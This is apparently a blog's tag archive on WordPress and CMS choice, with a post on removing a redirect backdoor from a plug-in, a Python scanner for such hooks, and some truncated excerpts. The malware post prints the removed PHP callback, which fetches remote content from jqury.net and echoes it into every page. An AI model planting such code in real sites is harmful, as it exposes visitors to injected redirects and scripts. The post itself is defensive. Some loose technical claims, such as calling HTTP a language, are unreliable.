Tag Archives: php

Building a website, the easy way

I remember when I first started working on websites, the only program I used was the default basic text editor in Windows 98/Plus, Notepad. For me it was easy to create a website with HTML tags and such, but as some of you remember, in the old days most websites were plain and simple (yep, there are still websites like that). Other than companies like Sun Microsystems, IBM, Apple and Microsoft, not many websites were “pretty” to visit. Internet technology has come a long way with the rapid growth in web-based technologies during the infamous dot-com bubble. This has opened up new possibilities for the average consumer that were otherwise restricted to large companies. Content Management Systems, or simply CMS programs, are the best thing to happen since the discovery of the number pi (π). 🙂

Content Management System (CMS)

It is a piece of software installed on a web server that can be used either internally or globally for communication. They are much like email programs, except they manage HTTP content. What is HTTP content? Well, to put it simply, HTTP stands for Hypertext Transfer Protocol. It is like the English language that we use to communicate with each other. While English may not be understood by everyone, the HTTP language is standard on almost all web servers. There are many others and variations such as HTTPS, FTP, SSH, etc. still in use today, but to keep this article as simple as possible, I will avoid talking about them.

Anyway, in the old days you had to type each and every line of code using a program like Notepad or later Notepad++, HTML-Kit and other more evolved editing software. These files are saved with either the .htm or .html extension. The tide changed when a new language called PHP (Hypertext Preprocessor) was introduced in 1995. It is what we call a server-side scripting language, specifically designed for web development, but it later spread into other areas. Again, I don’t want to go into much detail; check out Wikipedia if you really want to know how it works. With PHP we can do things differently to benefit the average user. With PHP, the CMS has gone into overdrive because it allowed programmers to develop back-end code for general public use. For example, you can create a web page and attribute different conditions just by choosing from a list of items (I will talk about Categories and Tags in WordPress later). This is why using a CMS makes building websites as easy as ABC.

It is easy to make a website

By using CMS programs, anyone can build a website within an hour (not talking about large scale content with millions of pages here!). However, it all depends on the decisions you make at the very beginning. If you have limited knowledge of web development, I recommend you use a simple-to-use CMS like WordPress. In fact, the best CMS for beginners in my personal opinion is WordPress. There are many argumentative articles on the web for or against one CMS program over the other, but even the opponents of WordPress would agree that it is the best stepping stone into the world of HTTP over much more complex CMS programs like Drupal or Joomla. I will explain why in a bit. But let me introduce you to WordPress.

WordPress is/was designed for blogging as an open source CMS. Open source means that the code that goes into development is publicly available to others. Because it is open, it grew in popularity among professional bloggers. As it grew in popularity, so did the number of add-ons known as “Plugins”, which extended the customization abilities. It comes with a well organized graphical interface and a large community of supporters for those of you who are new to the web development field. To get access to this program, you will most likely have to choose a hosting service provider with WordPress scripts/program support. Shop around, and Google is your friend. However, be careful of choosing bad hosting companies like GoDaddy. Just because a company spends money on advertising doesn’t mean they are good at providing the service. I am satisfied with my host, HostGator, but I cannot promote any one of them, because I want you to choose for yourself. The other option is installing the WordPress script on your own server. Well, if you have a web server, you shouldn’t be reading this article! The software itself is free.

How to use it?

Since there are well written documents on usage, I don’t see the point of publishing the same thing over and over. So please read New To WordPress – Where to Start on the official site. If you are a visual person, please try YouTube. It is very easy to follow, and if you would like me to explain something here, please contact me with your questions.

Drupal, Joomla, DotNetNuke and the list goes on…

Uh… I don’t want to go into those deep philosophical and analytical arguments. I wrote this article for novice users. Yes, I have used every single one of them and I am more of an expert on Drupal and WordPress. I found Drupal, Joomla, DotNetNuke and others to be great CMS programs with very good possibilities. But the learning curve can be overwhelming for someone who is new to web publishing.

I am not the only one who thinks this way. In fact, the Drupal developers have recognized the “problem” (I don’t think Drupal has a problem), so they are trying to close the gap between WordPress and Drupal usability. This is obvious in their new version, Drupal 7, released this year. If you look at the standard costs associated with building and managing a website, most web design companies charge more for Drupal based sites than for WordPress based sites. Most large companies and organizations like University of Calgary and White House (Government of USA) use Drupal. However, I do not buy into the argument that Drupal is safer than WordPress. It is not WordPress that can harm your site; it is the plugins and themes which can cause problems. As long as you use well written themes like Graphene (Developer) and well written plugins (even official ones like JetPack), you will be fine. Make sure you keep the CMS and every script (plugins, etc.) up to date by installing updates regularly.

Joomla also has huge downfalls for average users. I found their updates to be erratic and usability is far worse than even Drupal. DotNetNuke is based on the .NET framework, is open source and only runs on Microsoft Windows environments. Not many service providers would be happy to go with Microsoft Windows servers without asking you to pay a premium. Even for me, it cost more than $500 (Canadian) to get my hands on Windows Server software for my home unit with a student discount. I despise Microsoft (and Apple) for being such cry babies. I would not recommend DotNetNuke to anyone.

There are reasons why you would choose a CMS like Drupal. But I am not going to go into detail on that, other than to say, if you require a complex website with advanced user management, Drupal is probably the best. DotNetNuke is best for Windows Server environments while others will run on open source server operating systems.

Last word on ethics of the Internet. Respect others by avoiding copying contents from sites and posting as yours. Happy blogging and keep the Internet safe for EVERYONE!

Fix your site from unauthorized redirect

Recently I added a plug-in from outside of the WordPress repository. To my horror, one of the files had malware code inserted into the “head” tag. The bad guys are so clever that they made their code run randomly, so it will not be detected by the web developer as soon as they install these bad plug-ins. So how do you know you have problems in your installed scripts? How do you go about fixing them? The answer to the first is that you probably won’t know until a visitor to your site or you yourself come across it. But if the bad guys are into stealing information such as credit card data, you may be out of luck.

I am going to specifically target one malware injection which can be detected by anyone: the automated redirection. The automated redirection is used to direct your visitor to whatever website the bad guys want to promote. Most of the time visitors are directed to survey sites, illegal websites such as drug trafficking and/or pornographic sites. Regardless of your moral values, the major issue here is that these scripts will not provide you with an option to disable and/or modify their behavior. That’s where programmers like us come in to save your site!

Once in a while, when I tried to view my website, I ended up redirected to an unknown website. So I dug around and found that a function called wp_head() in one of the PHP files is used as a backdoor to inject questionable code in the UberMenu plug-in. I used the Editor in the WP administration page to delete the function completely from the TipTour.class.php file (the file with this function). The code I removed was:

    // Callback hooked onto wp_head, so its output lands in the <head> of every page.
    function wp__head() {
        if (function_exists('curl_init')) {
            $ch = curl_init();
            // Fetch content from a third-party server on each page view.
            curl_setopt($ch, CURLOPT_URL, "http://www.jqury.net/?1");
            curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, "10");
            $data = curl_exec($ch);
            curl_close($ch);
            // Print whatever the remote server returned, unfiltered.
            echo "$data";
        }
    }
    add_action('wp_head', 'wp__head');

Protect yourself

If you find something wrong with your plug-in or you notice odd behavior, contact the developers as soon as possible. If you do not know who to contact for help, try using one of the free website scanners, which can come as a plug-in, a website or both. In addition, if there is an option to download an add-on to your servers directly from either the CMS developers or the add-on/plug-in developer, please use their resources. You should also run a virus scan on any externally loaded files before installing them in your http/www folders. After installing anything, check the folder and file permissions using FTP or cPanel (or similar programs) for 777 permissions. If you find any permissions have been changed to 777, immediately change the permissions manually (USE CAUTION: It may break your website!). Go to the SQL/MySQL administration panel and check for injection scripts, and if you find them, copy the file first and then delete them. Report such injections to the developers with the information on the copied injected file.
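The checks described above as an added example, not code from the original post or from any plug-in developer: this Python script walks a plug-in folder, reports entries with 0777 permissions, and flags PHP files where a function hooked onto wp_head or wp_footer both fetches remote content and prints it, which is the pattern of the removed wp__head() code. The wp_footer hook, the list of fetch functions and every function name in the script are assumptions chosen for illustration; only callbacks passed as a string name are matched.

```python
import os, re, stat, sys

# Hooks whose callbacks print into every page; the post's sample used wp_head.
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_head|wp_footer)['\"]\s*,\s*['\"](\w+)['\"]")
# Assumed list of calls that pull content from another server while the page renders.
FETCH_RE = re.compile(r"\b(curl_exec|file_get_contents|wp_remote_get|fsockopen)\s*\(")
OUTPUT_RE = re.compile(r"\b(echo|print)\b")

def function_body(src, name):
    """Return the brace-balanced body of `function name(...)`, or '' if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:  # heuristic: braces inside strings are not skipped
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def suspicious_hooks(src):
    """List (hook, callback) pairs whose callback fetches remote data and prints it."""
    hits = []
    for hook, cb in HOOK_RE.findall(src):
        body = function_body(src, cb)
        if FETCH_RE.search(body) and OUTPUT_RE.search(body):
            hits.append((hook, cb))
    return hits

def audit(root):
    """Walk a plug-in tree; report 0777 entries and PHP files with suspicious hooks."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: inspect the entry itself, not a link target
            if stat.S_ISLNK(st.st_mode):
                continue
            if stat.S_IMODE(st.st_mode) == 0o777:
                findings.append((path, "mode 0777"))
            if name.endswith(".php") and stat.S_ISREG(st.st_mode):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for hook, cb in suspicious_hooks(fh.read()):
                        findings.append((path, f"{cb}() on {hook} fetches and prints remote content"))
    return findings

if __name__ == "__main__":
    for path, why in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: {why}")
```

Run it against a copy of wp-content/plugins and review each reported file by hand; a match is a reason to read the code, not proof of malware.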

Always remember this is not limited to a single CMS. In fact, any website, even one without a CMS, could end up becoming a victim. However, since CMS programs are very popular among web developers and are used even by government agencies and institutions such as whitehouse.gov and ucalgary.ca (Drupal), bad hackers are increasingly targeting CMS based websites.

Installing MySQL Databases using SQL files

It can be a daunting task to create SQL databases when you are running your websites without any professional help. For most small businesses, it is a waste of money to hire a web developer to work on all the areas of a website. If you can follow instructions

Introduction to writing a WordPress plugin

If you stepped into the web development world using the HTTP (Hypertext Transfer Protocol) language, almost every file you created in “those days” had to be in .html or .htm format. The Internet’s WWW (World Wide Web) infrastructure has changed at a rapid rate since the introduction of the standardized HTTP language.

Without a header, it is just a code file.

This is because the limitations